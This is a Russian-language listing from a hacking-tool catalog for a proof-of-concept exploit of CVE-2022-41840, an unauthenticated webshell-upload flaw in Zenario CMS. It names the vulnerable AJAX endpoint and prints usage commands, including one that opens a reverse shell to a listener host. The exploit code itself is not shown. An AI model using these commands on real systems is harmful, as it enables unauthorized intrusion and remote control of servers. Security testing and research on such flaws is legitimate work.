Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-41840-PoC — Это PoC-эксплойт для CVE-2022-41840, работающий на Zenario | Kitploit
Инструменты/GitHubGitHub/princeaikinsbaidoo/cve-2022-41840-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubprinceaikinsbaidoo/cve-2022-41840-poc

CVE-2022-41840-PoC

Это PoC-эксплойт для CVE-2022-41840, работающий на Zenario

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
6 месяцев назадЕщё не проверено

Zenario CMS 9.3 - Неаутентифицированный эксплойт RCE

CVE-2022-41840

Неаутентифицированная уязвимость удаленного выполнения кода (RCE), затрагивающая Zenario CMS версии 9.3 и более ранние. Эксплойт использует уязвимость загрузки файлов в AJAX-эндпоинте для загрузки PHP-вебшелла и достижения выполнения кода.

Детали уязвимости

  • CVE: CVE-2022-41840
  • Затронутая версия: Zenario CMS <= 9.3
  • Тип уязвимости: Неаутентифицированная загрузка файлов, ведущая к RCE
  • Вектор атаки: HTTP POST на /zenario/ajax.php
  • Требуемые привилегии: Нет (неаутентифицированный)

Использование

Интерактивный вебшелл

root@kitploit:~
python3 zenario_exploit.py --target http://target.com

Выполнение одной команды

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --cmd "id"

Реверс-шелл

root@kitploit:~
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444

Требования

  • Python 3.x
  • библиотека requests

Установка зависимостей:

root@kitploit:~
pip install requests

Возможности

  • Автоматическая загрузка PHP-вебшелла через уязвимый AJAX-эндпоинт
  • Поддержка нескольких значений instanceId для повышения вероятности успеха
  • Извлечение пути на основе JSON и регулярных выражений
  • Несколько вариантов полезной нагрузки реверс-шелла (bash, python, perl, nc)
  • Полностью интерактивная PTY-оболочка с поддержкой терминала
  • Откат к вебшеллу при неудаче реверс-шелла

Отказ от ответственности

Только для образовательных целей и авторизованного тестирования безопасности.

Этот инструмент предоставляется исследователям безопасности и пентестерам для тестирования систем, которыми они владеют или на тестирование которых имеют явное разрешение. Несанкционированный доступ к компьютерным системам является незаконным и строго запрещен.

Сопровождающие не несут ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.

Лицензия

Этот код предоставлен в образовательных целях.

Скачать инструмент